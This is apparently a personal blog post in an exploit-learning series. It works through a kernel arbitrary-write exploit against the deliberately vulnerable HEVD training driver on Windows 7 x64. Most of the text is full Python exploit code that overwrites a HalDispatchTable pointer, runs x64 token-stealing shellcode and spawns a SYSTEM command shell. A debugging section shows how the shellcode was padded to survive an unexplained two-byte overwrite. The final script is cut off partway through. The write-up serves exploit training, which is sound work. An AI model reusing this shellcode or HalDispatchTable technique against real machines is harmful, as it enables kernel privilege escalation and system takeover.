HEVD Exploits – Windows 7 x86-64 Arbitrary Write


Introduction

Continuing on with the Windows exploit journey, it’s time to start exploiting kernel-mode drivers and learning about writing exploits for ring 0. As I did with my OSCE prep, I’m mainly blogging my progress as a way for me to reinforce concepts and keep meticulous notes I can reference later on. I can’t tell you how many times I’ve used my own blog as a reference for something I learned 3 months ago and had totally forgotten.

This series will be me attempting to run through every exploit on the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. I can’t even begin to explain how amazing a training tool like this is for those of us just starting out. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc.
  • how to install HEVD
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple: the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, so I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

I used the following blogs as references:

Huge thanks to the blog authors, no way I could’ve finished these first two exploits without your help/wisdom.

Goal

For this post, I mostly relied on the GradiusX code mentioned above. They’re doing a different technique in their code (hopefully we’ll try it at some point), but the way they deal with the SystemModuleInformation struct in Python was crucial to how I ended up doing it in this post. As you may remember from the x86 version of this post, the goal here was to create much more organized exploit code that utilizes classes instead of treating the aforementioned struct as a long string. We were successful in that. The only thing that really bugged me about this exploit was that, at some point during its run, the first two bytes of my shellcode buffer would be overwritten. Besides the BSODs, this was frustrating mostly because I never really root-caused the issue. The issue may in fact lie in the way I decided to allocate my userland string buffers in Python, but time will tell. Ultimately, I was able to overcome the overwrites and develop a reliable exploit.

This exploit code will be very similar to the last post, so please read that one if you haven’t. There’s honestly not much difference. We’ll only be talking about the differences and the shellcode overwrite issue and how I solved it.

You should be very familiar with our exploit approach from the previous post before continuing!!

Exploit Code Considerations for x64

In this section, I’ll be detailing aspects of the exploit code that differ from its x86 counterpart.

As you may recall from the first post, we need to get the kernel image name and base address so that we can use the address to calculate the location of the HalDispatchTable because we need to overwrite a function pointer there. A lot of this code will look the same, here is the entire function:

def base():
    
    print("[*] Calling NtQuerySystemInformation w/SystemModuleInformation")
    sys_info = create_string_buffer(0)
    sys_info_len = c_ulong(0)

    ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    sys_info = create_string_buffer(sys_info_len.value)

    result = ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    if result == 0x0:
        print("[*] Success, allocated {}-byte result buffer".format(str(len(sys_info))))

    else:
        print("[!] NtQuerySystemInformation failed with NTSTATUS: {}".format(hex(result)))

    class SYSTEM_MODULE_INFORMATION(Structure):
        _fields_ = [("Reserved", c_void_p * 2),
                    ("ImageBase", c_void_p),
                    ("ImageSize", c_long),
                    ("Flags", c_ulong),
                    ("LoadOrderIndex", c_ushort),
                    ("InitOrderIndex", c_ushort),
                    ("LoadCount", c_ushort),
                    ("ModuleNameOffset", c_ushort),
                    ("ImageName", c_char * 256)]

    # thanks GradiusX
    handle_num = c_ulong(0)
    handle_num_str = create_string_buffer(sys_info.raw[:8])
    memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

    print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))
    
    sys_info = create_string_buffer(sys_info.raw[8:])

    counter = 0
    for x in range(handle_num.value):
        tmp = SYSTEM_MODULE_INFORMATION()
        tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
        memmove(addressof(tmp), tmp_si, sizeof(tmp))
        # '"a" or "b" in s' is always true in Python, so test each name explicitly
        if "ntoskrnl" in tmp.ImageName or "ntkrnl" in tmp.ImageName:
            img_name = tmp.ImageName.split("\\")[-1]
            print("[*] Kernel Type: {}".format(img_name))
            kernel_base = hex(tmp.ImageBase)[:-1]
            print("[*] Kernel Base: {}".format(kernel_base))
            return img_name, kernel_base
        counter += sizeof(tmp)

The primary difference here is going to be establishing a class for the SYSTEM_MODULE_INFORMATION structure. It’s very similar to GradiusX’s class in their exploit script; however, I changed the name of the last member so that it was more congruent with FuzzySec’s PowerShell script. For more information about this struct, please see the documentation I referenced throughout this bug class exploitation process.

Let me break this down piece by piece. We declare a class that matches exactly with the aforementioned documentation that I referenced. We then create a handle_num variable of type c_ulong(), which is 4 bytes on Windows even on x64. We create a string buffer and fill it with the first 8 bytes of our returned sys_info struct: the 4-byte module count followed by 4 bytes of alignment padding that sit in front of the first pointer-aligned entry. We then memmove sizeof(handle_num) bytes of this buffer to the address of our handle_num variable, which allows us to get the value in decimal of the number of SystemModuleInformation objects we returned with our NtQuerySystemInformation API call. You can see this here:

handle_num = c_ulong(0)
handle_num_str = create_string_buffer(sys_info.raw[:8])
memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))

We then shorten the returned sys_info string by cutting off the first 8 bytes we just used and then iterate through the string, casting each 296-byte chunk as an instance of our class. You can see that we declare a counter variable which will increment each iteration by the size of our class (296 bytes). The loop does the following:

  • While we haven’t iterated through all of our returned modules (by getting the number of returned modules with handle_num.value),
  • create a temporary SYSTEM_MODULE_INFORMATION instance called tmp,
  • create a string buffer from the next 296-byte chunk (counter to counter + 296), which contains one complete returned struct,
  • move that string buffer into our temporary tmp struct. You can see all of this happening here:
    counter = 0
    for x in range(handle_num.value):
        tmp = SYSTEM_MODULE_INFORMATION()
        tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
        memmove(addressof(tmp), tmp_si, sizeof(tmp))
        # '"a" or "b" in s' is always true in Python, so test each name explicitly
        if "ntoskrnl" in tmp.ImageName or "ntkrnl" in tmp.ImageName:
            img_name = tmp.ImageName.split("\\")[-1]
            print("[*] Kernel Type: {}".format(img_name))
            kernel_base = hex(tmp.ImageBase)[:-1]
            print("[*] Kernel Base: {}".format(kernel_base))
            return img_name, kernel_base
        counter += sizeof(tmp)
    

We then check the ImageName member of the struct, and if it’s a match for the kernel images we want to keep track of, we progress. We grab the name and the base address and return them. Function over, we just massively improved our code from the x86 version.
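To make the buffer layout concrete, here is a minimal, platform-independent sketch of the same parsing idea. It is not the exploit code: it is written for Python 3, it uses fixed-width ctypes types in place of c_void_p and c_ulong so that it behaves the same off Windows, and the names SystemModuleEntry, parse_modules, find_kernel, and fake_entry, as well as the two module base addresses, are made up for illustration.

```python
import ctypes
import struct


class SystemModuleEntry(ctypes.Structure):
    # Same field layout as the SYSTEM_MODULE_INFORMATION class above, but with
    # fixed-width types so sizeof() is 296 on any platform.
    _fields_ = [
        ("Reserved", ctypes.c_uint64 * 2),
        ("ImageBase", ctypes.c_uint64),
        ("ImageSize", ctypes.c_uint32),
        ("Flags", ctypes.c_uint32),
        ("LoadOrderIndex", ctypes.c_uint16),
        ("InitOrderIndex", ctypes.c_uint16),
        ("LoadCount", ctypes.c_uint16),
        ("ModuleNameOffset", ctypes.c_uint16),
        ("ImageName", ctypes.c_char * 256),
    ]


def parse_modules(raw):
    # Layout: 4-byte module count, 4 bytes of padding, then 296-byte entries.
    (count,) = struct.unpack_from("<I", raw, 0)
    size = ctypes.sizeof(SystemModuleEntry)
    return [SystemModuleEntry.from_buffer_copy(raw, 8 + i * size)
            for i in range(count)]


def find_kernel(entries):
    # Test each candidate name explicitly; return (file name, base) or None.
    for entry in entries:
        name = entry.ImageName.lower()
        if b"ntoskrnl" in name or b"ntkrnl" in name:
            return entry.ImageName.split(b"\\")[-1], entry.ImageBase
    return None


def fake_entry(path, base):
    # Hypothetical helper: builds one synthetic entry for the demo buffer.
    entry = SystemModuleEntry()
    entry.ImageBase = base
    entry.ImageName = path
    return bytes(entry)


# Synthetic buffer with made-up base addresses, standing in for sys_info.raw.
raw = (struct.pack("<II", 2, 0)
       + fake_entry(b"\\SystemRoot\\system32\\hal.dll", 0xFFFFF80002A00000)
       + fake_entry(b"\\SystemRoot\\system32\\ntoskrnl.exe", 0xFFFFF80002A49000))

print(ctypes.sizeof(SystemModuleEntry))
print(find_kernel(parse_modules(raw)))
```

Putting a non-kernel module first in the synthetic buffer is deliberate: it only returns the right entry when the name check actually discriminates between modules.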

I’m not going to paste the entire function this time; however, in the next function we need to call both LoadLibraryA and GetProcAddress so that we can ultimately calculate the location of our target HDT function pointer. In order for those APIs to behave properly, we have to set restype (and argtypes) in ctypes to change the return and argument types of a function. By default ctypes assumes a C int return value, which would truncate 64-bit handles and addresses. We do so accordingly to work with our 64-bit OS:

kernel32.LoadLibraryA.restype = c_uint64
kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
kernel32.GetProcAddress.restype = c_uint64
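As a rough illustration of why the return type matters, the sketch below pushes a 64-bit value through c_int (the type ctypes assumes for return values unless told otherwise) and through c_uint64. The handle value is hypothetical and was picked only so that the upper 32 bits are non-zero; the snippet is written for Python 3 and does not call any Windows API.

```python
import ctypes

# Hypothetical 64-bit module handle, for illustration only.
handle = 0x000007FEF1230000

# ctypes integer types do no overflow checking: c_int keeps only the low
# 32 bits and interprets them as a signed value.
truncated = ctypes.c_int(handle).value

# c_uint64 keeps the whole value.
full = ctypes.c_uint64(handle).value

print(hex(truncated & 0xFFFFFFFF))
print(hex(full))
```

With a truncated handle, the later subtraction of the userland base from the userland HalDispatchTable address would produce a meaningless offset.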

Everything else works pretty much the same, except our target_hal variable on this one will be the HalDispatchTable+0x8 since we’re dealing with 8-byte pointers now (previously, it was HalDispatchTable+0x4). You would think now, all we do is just paste in the Token Stealing shellcode for x64 we already used in the stack overflow post and be on our merry way; however, that was not the case. As of right now, after inserting our shellcode from the last x64 exploit we performed, our code looks like this in all:

import ctypes, sys, struct
from ctypes import *
from ctypes.wintypes import *
from subprocess import *

kernel32 = windll.kernel32
ntdll = windll.ntdll

# HEVD!TriggerArbitraryOverwrite instructions: 
# mov     r11,qword ptr [rbx]
# mov     qword ptr [rdi],r11

def base():
    
    print("[*] Calling NtQuerySystemInformation w/SystemModuleInformation")
    sys_info = create_string_buffer(0)
    sys_info_len = c_ulong(0)

    ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    sys_info = create_string_buffer(sys_info_len.value)

    result = ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    if result == 0x0:
        print("[*] Success, allocated {}-byte result buffer".format(str(len(sys_info))))

    else:
        print("[!] NtQuerySystemInformation failed with NTSTATUS: {}".format(hex(result)))

    class SYSTEM_MODULE_INFORMATION(Structure):
        _fields_ = [("Reserved", c_void_p * 2),
                    ("ImageBase", c_void_p),
                    ("ImageSize", c_long),
                    ("Flags", c_ulong),
                    ("LoadOrderIndex", c_ushort),
                    ("InitOrderIndex", c_ushort),
                    ("LoadCount", c_ushort),
                    ("ModuleNameOffset", c_ushort),
                    ("ImageName", c_char * 256)]

    # thanks GradiusX
    handle_num = c_ulong(0)
    handle_num_str = create_string_buffer(sys_info.raw[:8])
    memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

    print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))

    sys_info = create_string_buffer(sys_info.raw[8:])

    counter = 0
    for x in range(handle_num.value):
        tmp = SYSTEM_MODULE_INFORMATION()
        tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
        memmove(addressof(tmp), tmp_si, sizeof(tmp))
        # '"a" or "b" in s' is always true in Python, so test each name explicitly
        if "ntoskrnl" in tmp.ImageName or "ntkrnl" in tmp.ImageName:
            img_name = tmp.ImageName.split("\\")[-1]
            print("[*] Kernel Type: {}".format(img_name))
            kernel_base = hex(tmp.ImageBase)[:-1]
            print("[*] Kernel Base: {}".format(kernel_base))
            return img_name, kernel_base
        counter += sizeof(tmp)

def hal_calc(img_name, kernel_base):

    
    kernel32.LoadLibraryA.restype = c_uint64
    kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
    kernel32.GetProcAddress.restype = c_uint64
    
    kern_handle = kernel32.LoadLibraryA(img_name)
    if not kern_handle:
        print("[!] LoadLibrary failed to retrieve handle to kernel with error: {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Kernel Handle: {}".format(hex(kern_handle))[:-1])

    userland_hal = kernel32.GetProcAddress(kern_handle,"HalDispatchTable")
    if not userland_hal:
        print("[!] GetProcAddress failed with error {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Userland HalDispatchTable Address: {}".format(hex(userland_hal))[:-1])

    kernel_hal = userland_hal - kern_handle + int(kernel_base,16)
    printable_hal = hex(kernel_hal)
    if printable_hal[-1] == "L":
        printable_hal = printable_hal[:-1]
    print("[*] Kernel HalDispatchTable Address: {}".format(printable_hal))

    target_hal = kernel_hal + 0x8    
    print("[*] Target HalDispatchTable Function Pointer at: {}".format(hex(target_hal)[:-1]))

    return target_hal    

def send_buf(target_hal):

    hevd = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 
        0xC0000000, 
        0, 
        None, 
        0x3, 
        0, 
        None)
    
    if (not hevd) or (hevd == -1):
        print("[!] Failed to retrieve handle to device-driver with error-code: " + str(GetLastError()))
        sys.exit(1)
    else:
        print("[*] Successfully retrieved handle to device-driver: " + str(hevd))

    
    shellcode = bytearray(
        "\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
        "\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
        "\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
        "\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
        "\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
        "\x5B\x59\x58\xc3")

    print("[*] Allocating shellcode character array...")
    try:
        usermode_addr = (c_char * len(shellcode)).from_buffer(shellcode)
        ptr = addressof(usermode_addr)
    except Exception as e:
        print("[!] Failed to allocate shellcode char array with error: " + str(e))
    print("[*] Allocated shellcode character array at: {}".format(hex(ptr)[:-1]))

    print("[*] Marking shellcode RWX...")
    result = kernel32.VirtualProtect(
        usermode_addr,
        c_int(len(shellcode)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code: {}".format(str(GetLastError())))

    print("[*] Allocating our What buffer...")
    try:
        new_buf_contents = bytearray(struct.pack("<Q", ptr))
        new_buf = (c_char * len(new_buf_contents)).from_buffer(new_buf_contents)
        new_buf_ptr = addressof(new_buf)
    except Exception as e:
        print("[!] Failed to allocate What buffer with error: " + str(e))
    print("[*] Allocated What buffer at: {}".format(hex(new_buf_ptr)[:-1]))

    print("[*] Marking What buffer RWX...")
    result = kernel32.VirtualProtect(
        new_buf,
        c_int(len(new_buf_contents)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code {}".format(str(GetLastError())))

    buf = struct.pack("<Q", new_buf_ptr)
    buf += struct.pack("<Q", target_hal)
    buf_length = len(buf)
    
    result = kernel32.DeviceIoControl(
        hevd,
        0x22200b,
        buf,
        buf_length,
        None,
        0,
        byref(c_ulong()),
        None
    )

    if result != 0:
        print("[*] Buffer sent to driver successfully.")
    else:
        print("[!] Payload failed. Last error: " + str(GetLastError()))

def exploit():
    
    print("[*] Triggering with NtQueryIntervalProfile...")
    ntdll.NtQueryIntervalProfile(0x2408, byref(c_ulong()))

    print("[*] Opening system shell...")
    Popen("start cmd", shell=True)


        
img_name, kernel_base = base()
target_hal = hal_calc(img_name, kernel_base)
send_buf(target_hal)
exploit()
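The address arithmetic inside hal_calc can be checked in isolation. This is a small sketch with a hypothetical helper name (rebase_hal) and made-up addresses; only the formula (userland symbol address minus userland load base, plus kernel base, plus one 8-byte slot) comes from the script above.

```python
def rebase_hal(userland_hal, userland_base, kernel_base, slot=1, ptr_size=8):
    # Offset of HalDispatchTable inside the image is the same in both mappings.
    offset = userland_hal - userland_base
    # Slot 1 is the second pointer in the table: +0x8 with 8-byte pointers.
    return kernel_base + offset + slot * ptr_size


# Made-up example values, not taken from a real session.
userland_base = 0x0000000140000000
userland_hal = 0x00000001401E9C60
kernel_base = 0xFFFFF80002A49000

target = rebase_hal(userland_hal, userland_base, kernel_base)
print(hex(target))

# The x86 version of the same calculation uses 4-byte pointers (+0x4).
target_x86_style = rebase_hal(userland_hal, userland_base, kernel_base, ptr_size=4)
```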

Roadblock

Possibly related to how I’m allocating buffers for my shellcode in Python, I ran into an issue where everything worked perfectly but somewhere between me allocating my shellcode buffer and then arriving at our NtQueryIntervalProfile API call (which triggers a call for the function pointer at HalDispatchTable+0x8), the first two bytes of my shellcode buffer are overwritten with \x26\x00. Let’s take a look in WinDBG and see what we can see.

Let’s set a breakpoint on HEVD!TriggerArbitraryOverwrite to get the party started and then run our exploit.

We hit our breakpoint as planned, let’s look at our debug messages in the console to get some more info.

We can see that our shellcode array is located at 0x1df64a0. Let’s check out our memory view of that location in memory.

Awesome, our shellcode looks exactly how we sent it. Let’s now set a breakpoint on NtQueryIntervalProfile since that is our trigger and we’ll know if everything is going to plan. (bp !NtQueryIntervalProfile)

Great, hit our breakpoint. Now let’s check out our shellcode buffer so you can see the problem! Let’s look at the exact same memory view again.

Houston, we have a problem. Look at the first two bytes there, \x26\x00 have overwritten the first two bytes of our shellcode buffer. If we disassemble this, we can see how this is now being interpreted.

Looking at the disassembly now, we see that the first 4 bytes of our overwritten shellcode, 26004153, are being interpreted as add byte ptr es:[rcx+53h],al.

Let’s grab some register values and see if we can figure out what this would do.

rax 0
rcx 2408

So if we add al (0) to the byte at rcx+0x53, which is 0x245b, we’re probably looking at an access violation as that is probably not mapped memory. I’m going to manually change \x26 to \xc3 (the opcode for RET) so we can exit out of this shellcode safely and keep working with this session. To manually change the memory, in the Memory view, simply put your cursor in front of the 26 and type one letter/number at a time; be patient, as this can take some time for WinDBG to register the change. Once done, I’m going to go ahead and hit g in the console and let our script finish.

Finding the Culprit

Let’s do all of this again, except this time, we’ll put an “access” breakpoint on the memory address of our shellcode buffer and we’ll catch whoever the hell is writing to it! Let’s first run the script again with our HEVD!TriggerArbitraryOverwrite breakpoint so we can get the console output, find our shellcode buffer pointer, and then set a breakpoint on it.

Perfect, now we set an access breakpoint on our shellcode buffer pointer with the following: ba w1 0x1e864a0.

ba == access breakpoint

w == watch for write operations

1 == on the first byte there

0x1e864a0 == address to monitor

Hit g and we’ll eventually hit our breakpoint.

We paused on mov rax,r8; however, the real culprit precedes this instruction: mov word ptr [r8+10h],ax.

If we look at some register values:

rax a0026
r8 1e86490

We can see how this would overwrite our first two bytes of our shellcode. r8 + 0x10 is going to be 0x1e864a0 (psst, that’s where our shellcode is) and we’re writing a 2 byte value there (word) which is the lower two bytes of rax (0026). So now we see how our shellcode was overwritten. How can we alter our shellcode so that we can take this overwrite and still progress?
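The effect of that word-sized store can be replayed in a few lines of Python. This is only a simulation on a bytearray (written for Python 3), using the rax value from the debugger and the first eight bytes of the original shellcode; it does not touch real process memory.

```python
import struct

# First 8 bytes of the original shellcode.
shellcode = bytearray(b"\x50\x51\x41\x53\x52\x48\x31\xC0")

rax = 0xA0026

# mov word ptr [r8+10h],ax stores the low 16 bits of rax, little-endian,
# at the start of the shellcode buffer.
struct.pack_into("<H", shellcode, 0, rax & 0xFFFF)

print(shellcode[:4].hex())
```

The first four bytes come out as 26 00 41 53, which is the byte sequence WinDBG disassembled as add byte ptr es:[rcx+53h],al.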

Moving on Despite the Haters

I’m honestly not sure why this is happening to us. I can’t really determine what instructions are leading to these conditions. The call stack is empty and devoid of named functions so that’s no help; furthermore, the address scheme is all userspace. It would be strange if it was my Python code causing the problems since this is happening temporally between the time my buffers are allocated and when NtQueryIntervalProfile is called. If you’re an exploit god, please reach out and let me know why I suck so bad.
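One way to probe the allocation hypothesis would be to stop executing out of a Python bytearray and instead copy the shellcode into a dedicated region obtained from VirtualAlloc. The following is an untested sketch of that idea, not something verified against this overwrite: it is written for Python 3, the helper name alloc_rwx is made up, and it may or may not make the \x26\x00 write go away.

```python
import ctypes
import sys

MEM_COMMIT_RESERVE = 0x3000        # MEM_COMMIT | MEM_RESERVE
PAGE_EXECUTE_READWRITE = 0x40


def alloc_rwx(payload):
    """Copy payload into a fresh RWX allocation and return its address.

    Windows only: the memory is owned by the process, not by a Python object.
    """
    if sys.platform != "win32":
        raise OSError("VirtualAlloc is only available on Windows")

    kernel32 = ctypes.windll.kernel32
    # Declare 64-bit-safe prototypes so the returned pointer is not truncated.
    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    kernel32.VirtualAlloc.argtypes = [
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32,
    ]

    addr = kernel32.VirtualAlloc(
        None, len(payload), MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE
    )
    if not addr:
        raise ctypes.WinError()

    ctypes.memmove(addr, bytes(payload), len(payload))
    return addr
```

The returned address would take the place of ptr when packing the What buffer. If the first two bytes still get clobbered at the new address, the bytearray allocation is probably not the cause.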

We can leverage the ndisasm utility on Linux to test out some alternative scenarios dealing with our overwrite. Our model shellcode is this:

 "\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
 "\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
 "\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
 "\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
 "\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
 "\x5B\x59\x58\xc3"

Ok, so what happens when we take that first line, overwrite the first two bytes with \x26\x00 ?

 root@kali:~# echo -ne '\x26\x00\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  26004153          add [es:rcx+0x53],al
00000004  52                push rdx
00000005  4831C0            xor rax,rax
00000008  65488B8088010000  mov rax,[gs:rax+0x188]

This is precisely what we saw in the WinDBG disassembler! Perfect. Let’s experiment. My first thought: We are overwriting two bytes, let’s put two NOPs as padding! We would then end up with something like this:

root@kali:~# echo -ne '\x26\x00\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  26005051          add [es:rax+0x51],dl
00000004  4153              push r11
00000006  52                push rdx
00000007  4831C0            xor rax,rax
0000000A  65488B8088010000  mov rax,[gs:rax+0x188]

Oof, that’s still not good. This would also definitely be an access violation, as you’ll remember rax was 0 when we ran our exploit at this stage. This memory wouldn’t be mapped. We need a way to alter how the bytes following \x26\x00 are interpreted. What if we add a third padding byte whose purpose is to separate the \x26\x00 bytes as harmlessly as possible from the rest of our shellcode? I started experimenting. Let’s just try adding a \x00 byte and see what happens!

root@kali:~# echo -ne '\x26\x00\x00\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  260000            add [es:rax],al
00000003  50                push rax
00000004  51                push rcx
00000005  4153              push r11
00000007  52                push rdx
00000008  4831C0            xor rax,rax
0000000B  65488B8088010000  mov rax,[gs:rax+0x188]

This is still not optimal, as you can see, we’re still directly writing to memory that is at a very low address space and will cause us problems most likely. However, we did successfully truncate this series of operations to only 3 bytes! I started spamming potential 3rd byte padding candidates with a script and eventually landed on candidate \xff. Let’s test this out and see if this works for our purposes:

root@kali:~# echo -ne '\x26\x00\xff\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00' | ndisasm -b64 -
00000000  2600FF            es add bh,bh
00000003  50                push rax
00000004  51                push rcx
00000005  4153              push r11
00000007  52                push rdx
00000008  4831C0            xor rax,rax
0000000B  65488B8088010000  mov rax,[gs:rax+0x188]

Wow, now this is perfect. All we’re doing now is just adding a register to a register. There’s not really any way this can get us in trouble. And since our shellcode runs directly after this first operation, if we had to, we could change the register back to its original value with no problem!

This instruction es add bh,bh doesn’t really cause problems either. You can read here about how data segment registers work on 64 bit operating systems.
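The reason \xff behaves differently from \x00, \x41, or \x50 comes down to how the byte after opcode \x00 (ADD r/m8, r8) is decoded: it is a ModRM byte, and only when its top two bits are 11 does the instruction work purely on registers. Below is a small sketch of that decoding, written for Python 3. The helper name classify_add_modrm is made up, the decoder only covers this one opcode without a REX prefix, and it is an after-the-fact explanation rather than the candidate-spamming script mentioned above.

```python
# 8-bit register names selected by a 3-bit field when no REX prefix is present.
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]


def classify_add_modrm(modrm):
    """Describe what byte `modrm` means when it follows opcode 0x00."""
    mod = modrm >> 6            # addressing mode
    reg = (modrm >> 3) & 7      # source register
    rm = modrm & 7              # destination register or memory base

    if mod == 3:
        # Register-to-register: no memory access, no further bytes consumed.
        text = "add {},{}".format(REG8[rm], REG8[reg])
        return {"memory": False, "extra_bytes": 0, "text": text}

    extra = 0
    if rm == 4:
        extra += 1              # a SIB byte follows (it may add a disp32 too)
    if mod == 1:
        extra += 1              # 8-bit displacement
    elif mod == 2 or (mod == 0 and rm == 5):
        extra += 4              # 32-bit displacement
    return {"memory": True, "extra_bytes": extra, "text": None}


for candidate in (0x41, 0x50, 0x00, 0xFF):
    print(hex(candidate), classify_add_modrm(candidate))

# Every third byte that keeps the clobbered instruction register-only.
safe_bytes = [b for b in range(256) if not classify_add_modrm(b)["memory"]]
```

Under this decoding, 0xC0 through 0xFF are the register-only candidates. A register-only form still changes its destination register and the flags (add bh,bh modifies part of rbx), so which candidate is truly harmless depends on what the caller expects to be preserved.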

So this is perfect. We can update our shellcode now to be the following:

"\x90\x90\xff\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
"\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
"\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
"\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
"\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
"\x5B\x59\x58\xc3"

If we update our script with that shellcode, our final exploit code becomes:

import ctypes, sys, struct
from ctypes import *
from ctypes.wintypes import *
from subprocess import *

kernel32 = windll.kernel32
ntdll = windll.ntdll

# HEVD!TriggerArbitraryOverwrite instructions: 
# mov     r11,qword ptr [rbx]
# mov     qword ptr [rdi],r11

def base():
    
    print("[*] Calling NtQuerySystemInformation w/SystemModuleInformation")
    sys_info = create_string_buffer(0)
    sys_info_len = c_ulong(0)

    ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    sys_info = create_string_buffer(sys_info_len.value)

    result = ntdll.NtQuerySystemInformation(
        0xb,
        sys_info,
        len(sys_info),
        addressof(sys_info_len)
    )

    if result == 0x0:
        print("[*] Success, allocated {}-byte result buffer".format(str(len(sys_info))))

    else:
        print("[!] NtQuerySystemInformation failed with NTSTATUS: {}".format(hex(result)))

    class SYSTEM_MODULE_INFORMATION(Structure):
        _fields_ = [("Reserved", c_void_p * 2),
                    ("ImageBase", c_void_p),
                    ("ImageSize", c_long),
                    ("Flags", c_ulong),
                    ("LoadOrderIndex", c_ushort),
                    ("InitOrderIndex", c_ushort),
                    ("LoadCount", c_ushort),
                    ("ModuleNameOffset", c_ushort),
                    ("ImageName", c_char * 256)]

    # thanks GradiusX
    handle_num = c_ulong(0)
    handle_num_str = create_string_buffer(sys_info.raw[:8])
    memmove(addressof(handle_num), handle_num_str, sizeof(handle_num))

    print("[*] Result buffer contains {} SystemModuleInformation objects".format(str(handle_num.value)))

    sys_info = create_string_buffer(sys_info.raw[8:])

    counter = 0
    for x in range(handle_num.value):
        tmp = SYSTEM_MODULE_INFORMATION()
        tmp_si = create_string_buffer(sys_info[counter:counter + sizeof(tmp)])
        memmove(addressof(tmp), tmp_si, sizeof(tmp))
        # '"a" or "b" in s' is always true in Python, so test each name explicitly
        if "ntoskrnl" in tmp.ImageName or "ntkrnl" in tmp.ImageName:
            img_name = tmp.ImageName.split("\\")[-1]
            print("[*] Kernel Type: {}".format(img_name))
            kernel_base = hex(tmp.ImageBase)[:-1]
            print("[*] Kernel Base: {}".format(kernel_base))
            return img_name, kernel_base
        counter += sizeof(tmp)

def hal_calc(img_name, kernel_base):

    
    kernel32.LoadLibraryA.restype = c_uint64
    kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
    kernel32.GetProcAddress.restype = c_uint64
    
    kern_handle = kernel32.LoadLibraryA(img_name)
    if not kern_handle:
        print("[!] LoadLibrary failed to retrieve handle to kernel with error: {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Kernel Handle: {}".format(hex(kern_handle))[:-1])

    userland_hal = kernel32.GetProcAddress(kern_handle,"HalDispatchTable")
    if not userland_hal:
        print("[!] GetProcAddress failed with error {}".format(str(GetLastError())))
        sys.exit(1)
    print("[*] Userland HalDispatchTable Address: {}".format(hex(userland_hal))[:-1])

